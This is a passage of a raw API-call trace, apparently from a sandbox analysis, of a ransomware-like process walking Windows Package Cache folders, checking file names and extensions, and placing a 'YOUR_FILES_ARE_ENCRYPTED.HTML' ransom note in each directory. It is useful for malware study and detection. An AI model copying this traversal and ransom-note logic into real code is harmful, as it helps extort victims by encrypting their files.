[0110.556] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.556] GetProcessHeap () returned 0x600000 [0110.556] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.556] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb040ff29, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb040ff29, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0414ddd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f46d6, dwReserved1=0x6f4628, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.556] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb040ff29, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb040ff29, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0414ddd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f46d6, dwReserved1=0x6f4628, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.557] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.557] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0110.557] GetProcessHeap () returned 0x600000 [0110.557] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.557] GetProcessHeap () returned 0x600000 [0110.557] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.557] GetProcessHeap () returned 0x600000 [0110.557] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.558] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb041af4f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb041af4f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb042241a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.558] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb041af4f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb041af4f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb042241a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.558] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.558] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0110.558] GetProcessHeap () returned 0x600000 [0110.558] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.558] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.559] GetProcessHeap () returned 0x600000 [0110.559] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.559] GetProcessHeap () returned 0x600000 [0110.559] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.560] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4965d4d1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4965d4d1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4965d4d1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", cAlternateFileName="{E6E75~1")) returned 1 [0110.560] StrStrIW (lpFirst="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.560] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 75 [0110.560] GetProcessHeap () returned 0x600000 [0110.560] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.561] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" [0110.561] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*" [0110.561] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4965d4d1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4965d4d1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb042e75a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626878 [0110.561] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4965d4d1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4965d4d1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb042e75a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.561] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4965d4d1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4965d4d1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xa4f13e84, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x27e, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0110.561] StrStrIW (lpFirst="state.rsm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.561] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 85 [0110.561] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0110.561] lstrlenW (lpString=".rsm") returned 4 [0110.561] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0110.561] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4965d4d1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4965d4d1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x462e9abd, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0110.561] StrStrIW (lpFirst="vcredist_x86.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.561] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 92 [0110.561] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0110.561] lstrlenW (lpString=".exe") returned 4 [0110.561] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0110.561] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb042ad14, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb042ad14, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb04321f6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.561] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb042ad14, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb042ad14, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb04321f6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.561] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0110.561] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0110.561] GetProcessHeap () returned 0x600000 [0110.561] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.562] GetProcessHeap () returned 0x600000 [0110.562] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.562] GetProcessHeap () returned 0x600000 [0110.562] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.563] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ea95f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69eaf8db, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69eaf8db, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508", cAlternateFileName="{EEA66~1.285")) returned 1 [0110.563] StrStrIW (lpFirst="{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.563] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508") returned 87 [0110.563] GetProcessHeap () returned 0x600000 [0110.563] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.564] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508" [0110.564] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\*" [0110.564] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ea95f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69eaf8db, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb04fccdb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.564] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ea95f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69eaf8db, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb04fccdb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.564] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69eaf8db, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69eaf8db, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69eaf8db, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="packages", cAlternateFileName="")) returned 1 [0110.564] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.564] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages") returned 96 [0110.564] GetProcessHeap () returned 0x600000 [0110.564] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.565] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages" [0110.565] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\*" [0110.565] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69eaf8db, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69eaf8db, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb04f1c5d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f46d8, dwReserved1=0x6f4628, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.565] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69eaf8db, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69eaf8db, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb04f1c5d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f46d8, dwReserved1=0x6f4628, cFileName="..", cAlternateFileName="")) returned 1 [0110.565] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69eaf8db, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb04642ba, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb04642ba, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f46d8, dwReserved1=0x6f4628, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0110.565] StrStrIW (lpFirst="vcRuntimeMinimum_amd64", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.565] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64") returned 119 [0110.565] GetProcessHeap () returned 0x600000 [0110.565] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.568] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64" [0110.568] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\*" [0110.568] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69eaf8db, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb04642ba, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb04642ba, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63ab68, dwReserved1=0x6f4630, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.568] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69eaf8db, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb04642ba, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb04642ba, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63ab68, dwReserved1=0x6f4630, cFileName="..", cAlternateFileName="")) returned 1 [0110.568] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9153a800, ftCreationTime.dwHighDateTime=0x1d5c5bc, ftLastAccessTime.dwLowDateTime=0x9153a800, ftLastAccessTime.dwHighDateTime=0x1d5c5bc, ftLastWriteTime.dwLowDateTime=0xb05ee143, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x1704ac, dwReserved0=0x63ab68, dwReserved1=0x6f4630, cFileName="cab1.cab.8C2CB4E0B6FEFAC3BB1784C017E1373E18DB85BB9214C700DFC97826C9F4E40E", cAlternateFileName="CAB1CA~1.8C2")) returned 1 [0110.568] StrStrIW (lpFirst="cab1.cab.8C2CB4E0B6FEFAC3BB1784C017E1373E18DB85BB9214C700DFC97826C9F4E40E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.568] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.8C2CB4E0B6FEFAC3BB1784C017E1373E18DB85BB9214C700DFC97826C9F4E40E") returned 193 [0110.568] PathFindExtensionW (pszPath="cab1.cab.8C2CB4E0B6FEFAC3BB1784C017E1373E18DB85BB9214C700DFC97826C9F4E40E") returned=".8C2CB4E0B6FEFAC3BB1784C017E1373E18DB85BB9214C700DFC97826C9F4E40E" [0110.568] lstrlenW (lpString=".8C2CB4E0B6FEFAC3BB1784C017E1373E18DB85BB9214C700DFC97826C9F4E40E") returned 65 [0110.568] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbbd4500, ftCreationTime.dwHighDateTime=0x1d5c5bc, ftLastAccessTime.dwLowDateTime=0xcbbd4500, ftLastAccessTime.dwHighDateTime=0x1d5c5bc, ftLastWriteTime.dwLowDateTime=0xcbbd4500, ftLastWriteTime.dwHighDateTime=0x1d5c5bc, nFileSizeHigh=0x0, nFileSizeLow=0x2f000, dwReserved0=0x63ab68, dwReserved1=0x6f4630, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0110.568] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.568] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 145 [0110.568] PathFindExtensionW (pszPath="vc_runtimeMinimum_x64.msi") returned=".msi" [0110.568] lstrlenW (lpString=".msi") returned 4 [0110.568] PathFindExtensionW (pszPath="vc_runtimeMinimum_x64.msi") returned=".msi" [0110.568] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb044e343, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb044e343, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb045a78e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63ab68, dwReserved1=0x6f4630, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.568] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: 